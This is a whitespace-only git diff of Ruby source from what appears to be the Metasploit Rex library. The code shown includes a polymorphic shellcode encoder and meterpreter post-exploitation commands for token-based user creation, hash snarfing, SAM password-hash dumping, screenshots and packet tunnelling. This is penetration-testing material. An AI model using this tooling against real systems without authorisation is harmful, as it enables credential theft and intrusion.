@@ -652,12 +652,12 @@ module Rex if host_object db.report_import_note(host_object.workspace, host_object) if device_id - detail = { - :key => { :src => 'nexpose' }, + detail = { + :key => { :src => 'nexpose' }, :src => 'nexpose', - :nx_device_id => device_id + :nx_device_id => device_id } - detail[:nx_console_id] = @nx_console_id if @nx_console_id + detail[:nx_console_id] = @nx_console_id if @nx_console_id NEXPOSE_HOST_DETAIL_FIELDS.each do |f| v = @report_data.delete(f.to_sym) diff --git a/lib/rex/parser/nokogiri_doc_mixin.rb b/lib/rex/parser/nokogiri_doc_mixin.rb index aad4ea779e..9a5b04de91 100644 --- a/lib/rex/parser/nokogiri_doc_mixin.rb +++ b/lib/rex/parser/nokogiri_doc_mixin.rb @@ -102,7 +102,7 @@ module Parser return [] unless orig_refs refs = [] orig_refs.each do |ref_hash| - + ref_hash_sym = Hash[ref_hash.map {|k, v| [k.to_sym, v] }] ref_type = ref_hash_sym[:source].to_s.strip.upcase ref_value = ref_hash_sym[:value].to_s.strip diff --git a/lib/rex/parser/retina_xml.rb b/lib/rex/parser/retina_xml.rb index 4c34cde91e..ed1ced1f00 100644 --- a/lib/rex/parser/retina_xml.rb +++ b/lib/rex/parser/retina_xml.rb @@ -17,7 +17,7 @@ class RetinaXMLStreamParser @host = { 'vulns' => [] } reset_audit_state end - + def reset_audit_state @audit = { 'refs' => [] } end @@ -106,5 +106,5 @@ __END__ - + diff --git a/lib/rex/parser/wapiti_nokogiri.rb b/lib/rex/parser/wapiti_nokogiri.rb index d9aad2d461..c5e04c2184 100644 --- a/lib/rex/parser/wapiti_nokogiri.rb +++ b/lib/rex/parser/wapiti_nokogiri.rb @@ -64,7 +64,7 @@ module Rex def report_vuln(&block) proto = @state[:url].split(":")[0] path = '/' + (@state[:url].split("/")[3..(@state[:url].split("/").length - 1)].join('/')) - + web_vuln_info = {} web_vuln_info[:web_site] = proto + "://" + @state[:host] + ":" + @state[:port] web_vuln_info[:path] = path 
@@ -85,7 +85,7 @@ module Rex elsif param.index("alert") web_vuln_info[:pname] = param.split('=')[0] #xss end - end + end web_vuln_info[:host] = @state[:host] web_vuln_info[:port] = @state[:port] diff --git a/lib/rex/payloads/win32/kernel/recovery.rb b/lib/rex/payloads/win32/kernel/recovery.rb index b9825eafc1..cc4cb09d29 100644 --- a/lib/rex/payloads/win32/kernel/recovery.rb +++ b/lib/rex/payloads/win32/kernel/recovery.rb @@ -23,7 +23,7 @@ module Recovery # Infinite 'hlt' loop. # def self.spin(opts = {}) - "\xf4\xeb\xfd" + "\xf4\xeb\xfd" end # diff --git a/lib/rex/peparsey/pe_memdump.rb b/lib/rex/peparsey/pe_memdump.rb index cf72ce5397..85f118f8c7 100644 --- a/lib/rex/peparsey/pe_memdump.rb +++ b/lib/rex/peparsey/pe_memdump.rb @@ -24,11 +24,11 @@ class PeMemDump < Pe end def self.new_from_file(filename, disk_backed = false) - + if filename[-4, 4] != '.rng' raise "Not a .rng file: #{filename}" end - + if filename[-9, 9] == "index.rng" raise SkipError end @@ -51,7 +51,7 @@ class PeMemDump < Pe self.sections = [ self.header_section ] self.image_base = 0 end - + def all_sections self.sections end diff --git a/lib/rex/peparsey/section.rb b/lib/rex/peparsey/section.rb index dfec34e7a7..3036028929 100644 --- a/lib/rex/peparsey/section.rb +++ b/lib/rex/peparsey/section.rb @@ -48,7 +48,7 @@ class Section return nil if !_section_header _section_header.v['Characteristics'] end - + def vma # a section header is not required return nil if !_section_header @@ -59,8 +59,8 @@ class Section # a section header is not required return nil if !_section_header _section_header.v['SizeOfRawData'] - end - + end + def _check_offset(offset, len = 1) if offset < 0 || offset+len > size raise BoundsError, "Offset #{offset} outside of section", caller diff --git a/lib/rex/pescan/scanner.rb b/lib/rex/pescan/scanner.rb index 01e83bfd55..be55c11edd 100644 --- a/lib/rex/pescan/scanner.rb +++ b/lib/rex/pescan/scanner.rb 
@@ -32,7 +32,7 @@ module Scanner if(param['disasm']) #puts [msg].pack('H*').inspect insns = [] - + msg.gsub!("; ", "\n") if msg.include?("retn") msg.gsub!("retn", "ret") diff --git a/lib/rex/pescan/search.rb b/lib/rex/pescan/search.rb index 1202fd3bad..19cb919c64 100644 --- a/lib/rex/pescan/search.rb +++ b/lib/rex/pescan/search.rb @@ -4,36 +4,36 @@ module PeScan module Search require "rex/assembly/nasm" - + class DumpRVA attr_accessor :pe - + def initialize(pe) self.pe = pe end - + def config(param) @address = pe.vma_to_rva(param['args']) end - + def scan(param) config(param) - + $stdout.puts "[#{param['file']}]" - + # Adjust based on -A and -B flags pre = param['before'] || 0 suf = param['after'] || 16 - + @address -= pre @address = 0 if (@address < 0 || ! @address) - + begin buf = pe.read_rva(@address, suf) rescue ::Rex::PeParsey::WtfError return end - + $stdout.puts pe.ptr_s(pe.rva_to_vma(@address)) + " " + buf.unpack("H*")[0] if(param['disasm']) insns = [] @@ -51,8 +51,8 @@ module Search addr = di.next_addr end end - - end + + end end class DumpOffset < DumpRVA @@ -62,7 +62,7 @@ module Search rescue Rex::PeParsey::BoundsError end end - end + end end end end diff --git a/lib/rex/platforms/windows.rb b/lib/rex/platforms/windows.rb index 85011d20b8..781ac34c08 100644 --- a/lib/rex/platforms/windows.rb +++ b/lib/rex/platforms/windows.rb @@ -46,7 +46,7 @@ module Windows HKEY_LOCAL_MACHINE end end - + end end end diff --git a/lib/rex/poly/machine.rb b/lib/rex/poly/machine.rb index 9e60195da1..9213444752 100644 --- a/lib/rex/poly/machine.rb +++ b/lib/rex/poly/machine.rb @@ -3,10 +3,10 @@ module Rex module Poly - require 'metasm' + require 'metasm' require 'rex/poly/machine/machine' require 'rex/poly/machine/x86' end - + end diff --git a/lib/rex/poly/machine/machine.rb b/lib/rex/poly/machine/machine.rb index 6bac6a8b1f..8e569de956 100644 --- a/lib/rex/poly/machine/machine.rb +++ b/lib/rex/poly/machine/machine.rb 
@@ -2,29 +2,29 @@ module Rex module Poly - + # # A machine capable of creating a small blob of code in a metamorphic kind of way. # Note: this is designed to perform an exhaustive search for a solution and can be - # slow. If you need a speedier option, the origional Rex::Polly::Block stuff is a + # slow. If you need a speedier option, the origional Rex::Polly::Block stuff is a # better choice. # class Machine - + QWORD = 8 DWORD = 4 WORD = 2 BYTE = 1 - + # # A Permutation! # class Permutation - + attr_accessor :active, :offset - + attr_reader :name, :primitive, :length, :args - + # # Create a new permutation object. # @@ -40,14 +40,14 @@ module Rex @offset = 0 @children = ::Array.new end - + # # Add in a child permutation to this one. Used to build the permutation tree. # def add_child( child ) @children << child end - + # # Does this permutation have children? # @@ -62,7 +62,7 @@ module Rex def remove_children @children.clear end - + # # Actully render this permutation into a raw buffer. # @@ -107,12 +107,12 @@ module Rex end # Update the length to reflect the new raw buffer @length = raw.to_s.length - # As the temp variable is only assigned for the duration of a single permutation we + # As the temp variable is only assigned for the duration of a single permutation we # can now release it if it was used in this permutation. @machine.release_temp_variable return raw.to_s end - + # # Test if this permutation raw buffer is valid in this machine (e.g. against the badchar list). # @@ -132,10 +132,10 @@ module Rex # Should a temporary variable have been assigned we can release it here. @machine.release_temp_variable end - end + end return result end - + # # Try to find a solution within the solution space by performing a depth first search # into the permutation tree and backtracking when needed. 
@@ -172,9 +172,9 @@ module Rex # No children can be made form part of the solution, return failure for this path in the tree. return false end - + end - + # # A symbolic permutation to mark locations like the begining and end of a group of blocks. # Used to calculate usefull offsets. @@ -189,7 +189,7 @@ module Rex # A symbolic block is allways active! @active = true end - + # # We block all attempts to set the active state of this permutation so as # it is always true. This lets us always address the offset. @@ -197,76 +197,76 @@ module Rex def active=( value ) end end - + # # A primitive is a machine defined permutation which accepts some arguments when it is called. # class Primitive - + # # Initialize this primitive with its target source procedure and the machine it belongs to. # def initialize( source ) @source = source end - + # # Call the primitives source procedure, passing in the arguments. # def call( name, machine, *args ) return @source.call( name, machine, *args ) end - + end - + # # # class Block - + #attr_accessor :next, :previous attr_reader :name - + def initialize( name ) @name = name @next = nil @previous = nil @permutations = ::Array.new end - + def shuffle @permutations = @permutations.shuffle end - + def solve @permutations.first.solve end - + def << ( permutation ) @permutations << permutation end - + def each @permutations.each do | permutation | yield permutation end end - + end - + # # A class to hold a solution for a Rex::Poly::Machine problem. # class Solution - + attr_reader :offset - + def initialize @permutations = ::Array.new @reg_state = ::Array.new @offset = 0 end - + # # Reset this solution to an empty state. # @@ -279,7 +279,7 @@ module Rex @permutations.clear @reg_state.clear end - + # # Push a new permutation onto this solutions permutations list and save the associated register/variables state # 
@@ -290,7 +290,7 @@ module Rex @permutations.push( permutation ) @reg_state.push( [ [].concat(reg_available), [].concat(reg_consumed), {}.merge(variables) ] ) end - + # # Pop off the last permutaion and register/variables state from this solution. # @@ -342,45 +342,45 @@ module Rex end return raw end - + end - + # # Create a new machine instance. # def initialize( badchars, cpu ) @badchars = badchars @cpu = cpu - + @reg_available = ::Array.new @reg_consumed = ::Array.new @variables = ::Hash.new @blocks = ::Hash.new @primitives = ::Hash.new @solution = Solution.new - + _create_primitives - + @blocks['begin'] = Block.new( 'begin' ) @blocks['begin'] << SymbolicPermutation.new( 'begin', self ) - + _create_variable( 'temp' ) end - + # # Overloaded by a subclass to return the maximum native general register size supported. # def native_size nil end - + # # Use METASM to assemble a line of asm using this machines current cpu. # def assemble( asm ) return Metasm::Shellcode.assemble( @cpu, asm ).encode_string end - + # # Check if a data blob is valid against the badchar list (or perform any other validation here) # @@ -390,7 +390,7 @@ module Rex end return Rex::Text.badchar_index( data, @badchars ).nil? end - + # # Generate a 64 bit number whoes bytes are valid in this machine. # @@ -418,7 +418,7 @@ module Rex def make_safe_byte( number=nil ) return _make_safe_number( BYTE, number ) & 0xFF end - + # # Create a variable by name which will be assigned a register during generation. We can # optionally assign a static register value to a variable if needed. @@ -430,7 +430,7 @@ module Rex end return _create_variable( name, reg ) end - + # # If the temp variable was assigned we release it. # @@ -448,7 +448,7 @@ module Rex end return false end - + # # Resolve a variable name into its currently assigned register value. # 
@@ -472,14 +472,14 @@ module Rex # resolve the register number int a string representation (e.g. 0 in x86 is EAX if size is 32) return _register_value( regnum, size ) end - + # # Check this solution is still currently valid (as offsets change it may not be). # def solution_is_valid? return self.is_valid?( @solution.buffer ) end - + # # As the solution advances we save state for each permutation step in the solution. This lets # use rewind at a later stage if the solving algorithm wishes to perform some backtracking. @@ -487,7 +487,7 @@ module Rex def solution_push( permutation ) @solution.push( permutation, @reg_available, @reg_consumed, @variables ) end - + # # Backtrack one step in the solution and restore the register/variable state. # @@ -496,7 +496,7 @@ module Rex @reg_available.push( @reg_available.shift ) end - + # # Create a block by name and add in its list of permutations. # @@ -531,7 +531,7 @@ module Rex end return _create_block_primitive( block_name, primitive_name, *args ) end - + # # Get the offset for a blocks active permutation. This is easy for backward references as # they will already have been rendered and their sizes known. For forward references we @@ -558,16 +558,16 @@ module Rex def block_exist?( name ) return @blocks.include?( name ) end - + # # Does a given block exist? # def variable_exist?( name ) return @variables.include?( name ) end - + # XXX: ambiguity between variable names and block name may introduce confusion!!! make them be unique. - + # # Resolve a given value into either a number literal, a block offset or # a variables assigned register. @@ -580,7 +580,7 @@ module Rex end return value.to_i end - + # # Get the block previous to the target block. # @@ -606,7 +606,7 @@ module Rex end return nil end - + # # Try to generate a solution. # @@ -615,7 +615,7 @@ module Rex if( @blocks.has_key?( 'end' ) ) @blocks.delete( 'end' ) end - + @blocks['end'] = Block.new( 'end' ) @blocks['end'] << SymbolicPermutation.new( 'end', self, 1 ) 
@@ -635,31 +635,31 @@ module Rex end previous = current end - + # Shuffle the order of the available registers @reg_available = @reg_available.shuffle - - # We must try every permutation of the register orders, so if we fail to - # generate a solution we rotate the available registers to try again with + + # We must try every permutation of the register orders, so if we fail to + # generate a solution we rotate the available registers to try again with # a different order. This ensures we perform and exhaustive search. 0.upto( @reg_available.length - 1 ) do @solution.reset - # Start from the root node in the solution space and generate a + # Start from the root node in the solution space and generate a # solution by traversing the solution space's tree structure. if( @blocks['begin'].solve ) # Return the solutions buffer (perform a last pass to fixup all offsets)... return @solution.buffer end - + @reg_available.push( @reg_available.shift ) end - + # :( nil end - + # # An UndefinedPermutation exception is raised when a permutation can't render yet # as the conditions required are not yet satisfied. @@ -669,7 +669,7 @@ module Rex super end end - + # # An UnallowedPermutation exception is raised when a permutation can't ever render # as the conditions supplied are impossible to satisfy. @@ -679,7 +679,7 @@ module Rex super end end - + # # An InvalidPermutation exception is raised when a permutation receives a invalid # argument and cannot continue to render. This is a fatal exception. 
@@ -689,19 +689,19 @@ module Rex super end end - + protected - + # # Overloaded by a subclass to resolve a register number into a suitable register # name for the target architecture. E.g on x64 the register number 0 with size 64 - # would resolve to RCX. Size is nil by default to indicate we want the default + # would resolve to RCX. Size is nil by default to indicate we want the default # machine size, e.g. 32bit DWORD on x86 or 64bit QWORD on x64. # def _register_value( regnum, size=nil ) nil end - + # # Perform the actual variable creation. # @@ -735,7 +735,7 @@ module Rex @variables[name] = regnum return name end - + # # Create a block which is based on a primitive defined by this machine. # @@ -750,14 +750,14 @@ module Rex end return block_name end - + # # Overloaded by a subclass to create any primitives available in this machine. # def _create_primitives nil end - + # # Rex::Poly::Machine::Primitive # @@ -771,9 +771,9 @@ module Rex @primitives[name] << Primitive.new( permutation ) end end - + # - # Helper function to generate a number whoes byte representation is valid in this + # Helper function to generate a number whoes byte representation is valid in this # machine (does not contain any badchars for example). Optionally we can supply a # number and the resulting addition/subtraction of this number against the newly # generated value is also tested for validity. This helps in the assembly primitives 
@@ -792,38 +792,38 @@ module Rex else raise RuntimeError, "Invalid size '#{bytes}' used in _make_safe_number." end - + goodchars = (0..255).to_a - + @badchars.unpack( 'C*' ).each do | b | goodchars.delete( b.chr ) end while( true ) do value = 0 - + 0.upto( bytes-1 ) do | i | value |= ( (goodchars[ rand(goodchars.length) ] << i*8) & (0xFF << i*8) ) end - + if( not is_valid?( [ value ].pack(format) ) or not is_valid?( [ ~value ].pack(format) ) ) redo end - + if( not number.nil? ) if( not is_valid?( [ value + number ].pack(format) ) or not is_valid?( [ value - number ].pack(format) ) ) redo end end - + break end - + return value end - + end - + end - + end diff --git a/lib/rex/poly/machine/x86.rb b/lib/rex/poly/machine/x86.rb index e72d7aa2d7..05ecb82c0a 100644 --- a/lib/rex/poly/machine/x86.rb +++ b/lib/rex/poly/machine/x86.rb @@ -2,7 +2,7 @@ module Rex module Poly - + # # A subclass to represent a Rex poly machine on the x86 architecture. # 
@@ -19,25 +19,25 @@ module Rex @reg_available << Rex::Arch::X86::EDI @reg_available << Rex::Arch::X86::EBP @reg_available << Rex::Arch::X86::ESP - - # By default we consume the EBP register if badchars contains \x00. This helps speed - # things up greatly as many instructions opperating on EBP introduce a NULL byte. For - # example, a MOV instruction with EAX as the source operand is as follows: + + # By default we consume the EBP register if badchars contains \x00. This helps speed + # things up greatly as many instructions opperating on EBP introduce a NULL byte. For + # example, a MOV instruction with EAX as the source operand is as follows: # 8B08 mov ecx, [eax] - # but the same instruction with EBP as the source operand is as follows: + # but the same instruction with EBP as the source operand is as follows: # 8B4D00 mov ecx, [ebp] ; This is assembled as 'mov ecx, [ebp+0]' # we can see that EBP is encoded differently with an offset included. We can still - # try to generate a solution with EBP included and \x00 in the badchars list but + # try to generate a solution with EBP included and \x00 in the badchars list but # it can take considerably longer. if( ( consume_base_pointer.nil? and not Rex::Text.badchar_index( "\x00", @badchars ).nil? ) or consume_base_pointer == true ) create_variable( 'base_pointer', 'ebp' ) end - + # By default we consume the ESP register to avoid munging the stack. if( consume_stack_pointer ) create_variable( 'stack_pointer', 'esp' ) end - + # discover all the safe FPU instruction we can use. @safe_fpu_instructions = ::Array.new Rex::Arch::X86.fpu_instructions.each do | fpu | 
@@ -46,17 +46,17 @@ module Rex end end end - + # # The general purpose registers are 32bit # def native_size Rex::Poly::Machine::DWORD end - + # # Overload this method to intercept the 'set' primitive with the 'location' keyword - # and create the block with the '_set_variable_location'. We do this to keep a + # and create the block with the '_set_variable_location'. We do this to keep a # consistent style. # def create_block_primitive( block_name, primitive_name, *args ) @@ -66,10 +66,10 @@ module Rex super end end - + # - # XXX: If we have a loop primitive, it is a decent speed bump to force the associated variable - # of the first loop primitive to be assigned as ECX (for the x86 LOOP instruction), this is not + # XXX: If we have a loop primitive, it is a decent speed bump to force the associated variable + # of the first loop primitive to be assigned as ECX (for the x86 LOOP instruction), this is not # neccasary but can speed generation up significantly. # #def generate @@ -83,7 +83,7 @@ module Rex # # ...go go go # super #end - + protected # @@ -95,7 +95,7 @@ module Rex if( size.nil? ) size = native_size() end - + if( size == Rex::Poly::Machine::DWORD ) value = Rex::Arch::X86::REG_NAMES32[ regnum ] elsif( size == Rex::Poly::Machine::WORD ) @@ -108,7 +108,7 @@ module Rex end return value end - + # # Create the x86 primitives. # @@ -118,7 +118,7 @@ module Rex # Create the '_set_variable_location' primitive. The first param it the variable to place the current # blocks location value in. # - _create_primitive( '_set_variable_location', + _create_primitive( '_set_variable_location', ::Proc.new do | block, machine, variable | if( @safe_fpu_instructions.empty? ) raise UnallowedPermutation 
@@ -182,12 +182,12 @@ module Rex ] end ) - + # - # Create the 'loop' primitive. The first param it the counter variable which holds the number of + # Create the 'loop' primitive. The first param it the counter variable which holds the number of # times to perform the loop. The second param it the destination block to loop to. # - _create_primitive( 'loop', + _create_primitive( 'loop', ::Proc.new do | block, machine, counter, destination | if( machine.variable_value( counter ) != Rex::Arch::X86::REG_NAMES32[ Rex::Arch::X86::ECX ] ) # we raise and UndefinedPermutation exception to indicate that untill a valid register (ECX) is @@ -208,12 +208,12 @@ module Rex ] end ) - + # # Create the 'xor' primitive. The first param it the variable to xor with the second param value which # can be either a variable, literal or block offset. # - _create_primitive( 'xor', + _create_primitive( 'xor', ::Proc.new do | block, machine, variable, value | [ "xor #{machine.variable_value( variable )}, #{machine.resolve_value( value )}" @@ -230,11 +230,11 @@ module Rex ] end ) - + # # Create the 'goto' primitive. The first param is a destination block to jump to. # - _create_primitive( 'goto', + _create_primitive( 'goto', ::Proc.new do | block, machine, destination | offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) ) if( ( offset > 0 and offset > 127 ) or ( offset < 0 and offset < -127 ) ) @@ -253,13 +253,13 @@ module Rex ] end ) - + # # Create the 'add' primitive. The first param it the variable which will be added to the second - # param, which may either be a literal number value, a variables assigned register or a block + # param, which may either be a literal number value, a variables assigned register or a block # name, in which case the block offset will be used. # - _create_primitive( 'add', + _create_primitive( 'add', ::Proc.new do | block, machine, variable, value | if( machine.variable_exist?( value ) ) raise UnallowedPermutation 
@@ -276,7 +276,7 @@ module Rex ] end, ::Proc.new do | block, machine, variable, value | - [ + [ "add #{machine.variable_value( variable )}, #{machine.resolve_value( value )}" ] end, @@ -284,7 +284,7 @@ module Rex if( machine.variable_exist?( value ) ) raise UnallowedPermutation end - [ + [ "sub #{machine.variable_value( variable )}, #{ "0x%08X" % [ ~(machine.resolve_value( value ) - 1) & 0xFFFFFFFF ] }" ] end @@ -311,12 +311,12 @@ module Rex # ] # end, ) - + # # Create the 'set' primitive. The first param it the variable which will be set. the second # param is the value to set the variable to (a variable, block or literal). # - _create_primitive( 'set', + _create_primitive( 'set', ::Proc.new do | block, machine, variable, value | if( machine.variable_exist?( value ) ) raise UnallowedPermutation @@ -385,13 +385,13 @@ module Rex ] end ) - + # # Create the 'load' primitive. The first param it the variable which will be set. The second # param is the value (either a variable or literal) to load from. the third param is the size # of the load operation, either DWORD, WORD or BYTE. # - _create_primitive( 'load', + _create_primitive( 'load', ::Proc.new do | block, machine, variable, value, size | result = nil if( size == Rex::Poly::Machine::DWORD ) @@ -460,7 +460,7 @@ module Rex # # Create the 'store' primitive. # - _create_primitive( 'store', + _create_primitive( 'store', ::Proc.new do | block, machine, variable, value, size | result = nil if( size == Rex::Poly::Machine::DWORD ) @@ -483,12 +483,12 @@ module Rex ::Proc.new do | block, machine, variable, value, size | result = nil if( size == Rex::Poly::Machine::DWORD ) - result = [ + result = [ "push #{machine.resolve_value( value )}", "pop [#{machine.variable_value( variable )}]" ] elsif( size == Rex::Poly::Machine::WORD ) - result = [ + result = [ "push #{machine.resolve_value( value, WORD )}", "pop word [#{machine.variable_value( variable )}]" ] 
@@ -500,9 +500,9 @@ module Rex end ) end - + end - + end - -end \ No newline at end of file + +end diff --git a/lib/rex/post/dir.rb b/lib/rex/post/dir.rb index 8c73148e6b..0e5cdaa2db 100644 --- a/lib/rex/post/dir.rb +++ b/lib/rex/post/dir.rb @@ -19,31 +19,31 @@ class Dir def Dir.foreach(name, &block) entries(name).each(&block) end - + def Dir.chdir(path) raise NotImplementedError end - + def Dir.mkdir(path) raise NotImplementedError end - + def Dir.pwd raise NotImplementedError end - + def Dir.getwd raise NotImplementedError end - + def Dir.delete(path) raise NotImplementedError end - + def Dir.rmdir(path) raise NotImplementedError end - + def Dir.unlink(path) raise NotImplementedError end diff --git a/lib/rex/post/file_stat.rb b/lib/rex/post/file_stat.rb index c5ecee2b8a..992621f293 100644 --- a/lib/rex/post/file_stat.rb +++ b/lib/rex/post/file_stat.rb @@ -32,7 +32,7 @@ class FileStat self.stathash = {} update(buf) if (buf and not buf.empty?) end - + def dev self.stathash['st_dev'] end @@ -77,7 +77,7 @@ class FileStat # XXX: This needs to understand more than just 'stat' structures # Windows can also return _stat32, _stat32i64, _stat64i32, and _stat64 structures - + skeys = %W{st_dev st_ino st_mode st_wtf st_nlink st_uid st_gid st_rdev st_size st_ctime st_atime st_mtime} svals = buf.unpack("VvvvvvvVVVVV") skeys.each_index do |i| diff --git a/lib/rex/post/io.rb b/lib/rex/post/io.rb index 17e71d1d76..6583de81fa 100644 --- a/lib/rex/post/io.rb +++ b/lib/rex/post/io.rb @@ -133,7 +133,7 @@ class IO def readline(sep = $/) raise NotImplementedError end - + def readlines(sep = $/) raise NotImplementedError end @@ -141,7 +141,7 @@ class IO def rewind raise NotImplementedError end - + def seek(offset, whence = SEEK_SET) raise NotImplementedError end @@ -165,12 +165,12 @@ class IO def syswrite(buf) raise NotImplementedError end - + def tell return pos end - def ungetc(val) + def ungetc(val) raise NotImplementedError end 
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb index 2712727e97..54e5941ab8 100644 --- a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb @@ -6,7 +6,7 @@ module Extensions module NetworkPug TLV_TYPE_EXTENSION_NETWORKPUG = 0 -TLV_TYPE_NETWORKPUG_INTERFACE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 1) +TLV_TYPE_NETWORKPUG_INTERFACE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 1) TLV_TYPE_NETWORKPUG_FILTER = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 2) end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb index 4e35ba8ff2..e18cb20074 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb @@ -39,10 +39,10 @@ class Arp mac_addr.each_byte { |o| macocts << o } macocts += [0] * (6 - macocts.size) if macocts.size < 6 return sprintf("%02x:%02x:%02x:%02x:%02x:%02x", - macocts[0], macocts[1], macocts[2], + macocts[0], macocts[1], macocts[2], macocts[3], macocts[4], macocts[5]) end - + # # The ip address corresponding to the arp address. # diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb index cbfbe884ed..bc17fb9b55 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb @@ -118,7 +118,7 @@ class Config netstat = [] response = client.send_request(request) - + # Build out the array of netstat response.each(TLV_TYPE_NETSTAT_ENTRY) { |connection| netstat << Netstat.new( diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb index 9df87fbd5e..b947ea692e 100644 
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb @@ -38,7 +38,7 @@ class Netstat self.uid = opts[:uid] || 0 self.inode = opts[:inode] || 0 self.pid_name = opts[:pid_name] - + self.local_addr_str = sprintf("%s:%d",self.local_addr, self.local_port) if self.remote_port == 0 port = "*" @@ -48,7 +48,7 @@ class Netstat self.remote_addr_str = sprintf("%s:%s",self.remote_addr, port) end - + # # The local address of the connection # diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb index 06b42e9a78..c8dd03de88 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb @@ -74,14 +74,14 @@ class WinConstManager # # Returns an array of constant names that have a value matching "winconst" # and (optionally) a name that matches "filter_regex" - # + # def select_const_names(winconst, filter_regex=nil) matches = [] consts.each_pair do |name, value| matches << name if value == winconst end - + # Filter matches by name if a filter has been provided unless filter_regex.nil? matches.reject! do |name| diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb index cd4a981d0c..50eb6406fe 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb @@ -73,14 +73,14 @@ class Console::CommandDispatcher::Espia print_line("Grab a screenshot of the current interactive desktop.\n") return true end - + show = true show = false if (args[1] and args[1] =~ /^(f|n|0)/i) - + path = args[0] || Rex::Text.rand_text_alpha(8) + ".jpeg" - + data = client.espia.espia_image_get_dev_screen - + if( data ) ::File.open( path, 'wb' ) do |fd| fd.write( data ) 
@@ -89,7 +89,7 @@ class Console::CommandDispatcher::Espia print_line( "Screenshot saved to: #{path}" ) Rex::Compat.open_file( path ) if show end - + return true end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb index d6e2827f13..4040324737 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb @@ -124,7 +124,7 @@ class Console::CommandDispatcher::Incognito host = val end } - + if (args.length < 2) print_line("Usage: add_user [options]\n") print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted") @@ -154,7 +154,7 @@ class Console::CommandDispatcher::Incognito host = val end } - + if (args.length < 2) print_line("Usage: add_localgroup_user [options]\n") print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted") @@ -184,7 +184,7 @@ class Console::CommandDispatcher::Incognito host = val end } - + if (args.length < 2) print_line("Usage: add_group_user [options]\n") print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted") @@ -216,7 +216,7 @@ class Console::CommandDispatcher::Incognito print_line("[*] Snarfing token hashes...") client.incognito.incognito_snarf_hashes(args[0]) print_line("[*] Done. Check sniffer logs") - + return true end 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb index 8acec7a477..c10e76bd5c 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb @@ -58,7 +58,7 @@ class Console::CommandDispatcher::NetworkPug rescue Errno::EBUSY next end - + ifreq = [ name ].pack("a32") tapdev.ioctl(0x8927, ifreq) @@ -69,7 +69,7 @@ class Console::CommandDispatcher::NetworkPug return tapdev, name, mac } - + tapdev.close() return nil, nil, nil end @@ -86,7 +86,7 @@ class Console::CommandDispatcher::NetworkPug len = len.unpack('n')[0] #print_line("Got #{len} bytes from remote host's network") - + if(len > 1514 or len == 0) @tapdev.close() print_line("length is invalid .. #{len} ?, de-synchronized ? ") @@ -187,13 +187,13 @@ class Console::CommandDispatcher::NetworkPug return true end - + def cmd_networkpug_stop(*args) interface = args[0] if (interface == nil) print_error("Usage: networkpug_stop [interface]") return - end + end client.networkpug.networkpug_stop(interface) @@ -208,7 +208,7 @@ class Console::CommandDispatcher::NetworkPug # meterpreter dies if i try to join.. not sure why. @thread_stuff = nil - + #print_line("closing tapdev") @tapdev.close @@ -219,7 +219,7 @@ class Console::CommandDispatcher::NetworkPug print_status("Packet slinging stopped on #{interface}") return true end - + def name "NetworkPug" end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb index b8b7290a65..c5a019c6db 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb @@ -40,7 +40,7 @@ class Console::CommandDispatcher::Priv::Passwd client.priv.sam_hashes.each { |user| print_line("#{user}") } - + return true end 
